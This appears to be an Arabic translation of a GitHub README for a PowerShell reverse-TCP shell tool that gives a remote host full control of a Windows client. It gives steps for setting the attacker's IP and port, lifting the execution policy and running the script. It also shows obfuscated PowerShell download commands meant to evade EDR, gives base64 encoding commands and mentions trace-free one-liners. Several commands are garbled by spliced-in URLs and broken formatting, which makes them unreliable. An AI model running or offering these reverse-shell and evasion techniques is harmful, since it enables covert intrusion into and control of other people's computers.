
نصوص PowerShell للتواصل مع مضيف بعيد
نصوص PowerShell للتواصل مع مضيف بعيد.
سيكون للمضيف البعيد تحكم كامل في العميل وجميع أوامر النظام الأساسية.
تحقق من الشيلات بناءً على:
تم الاختبار باستخدام PowerShell v5.1.19041.2673 على نظام Windows 10 Enterprise (64 بت).
أُعد لأغراض تعليمية. آمل أن يساعد!
بدأ هذا المستودع في الحصول على تواقيع معروفة وليس لدي الوقت لتحميل نصوص جديدة في كل مرة، لذا يجب عليك تشويش هذه النصوص بنفسك.
خطط مستقبلية:
قم بتغيير عنوان IP ورقم المنفذ داخل النصوص حسب الحاجة.
افتح PowerShell من \src\invoke_expression\original\ أو \src\process_pipes\original\ وقم بتشغيل الأوامر الموضحة أدناه.
تعيين سياسة التنفيذ:```pwsh Set-ExecutionPolicy Unrestricted
تشغيل السكريبت:```pwsh
.\powershell_reverse_tcp.ps1
أو، قم بتشغيل الأمر التالي من إما PowerShell أو Command Prompt:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
## إخفاء سكريبتات PowerShell
حاول تجاوز EDR وآليات الأمان الأخرى عن طريق إخفاء سكريبتاتك. يمكنك رؤية مثل هذه الإخفاءات في الأمثلة أدناه.
أمر PowerShell الأصلي:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)
أمر PowerShell المبهم:```pwsh
& (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'
**تحقق من سكريبت PowerShell الأصلي [هنا](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) والسكريبت المُشوَّه بالكامل [هنا](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1).**
بعد [التشويش اليدوي](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1)، تم تشويش سكريبت PowerShell الأصلي باستخدام [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation). الشكر للمؤلف!
ابحث في الإنترنت عن تقنيات وأساليب إضافية للتشويش.
ملاحظة: نظرًا لأن PowerShell يتم تحديثه باستمرار، فقد تبدأ بعض التعبيرات المنتظمة (مثل `*ke-E*`) في إظهار استثناءات بسبب تطابق طرق متعددة مع نفس التعبير، لذا يجب تحديد التعبيرات بشكل أفضل قليلاً.
### أمر PowerShell المشفر
لإنشاء أمر PowerShell مشفر من سكريبت PowerShell، قم بتشغيل أمر PowerShell التالي:```pwsh
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
لفك تشفير أمر مشفر في PowerShell، قم بتشغيل الأمر التالي في PowerShell:```pwsh [Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
استخدم الأوامر الأحادية أدناه إذا كنت لا تريد ترك أي آثار.
---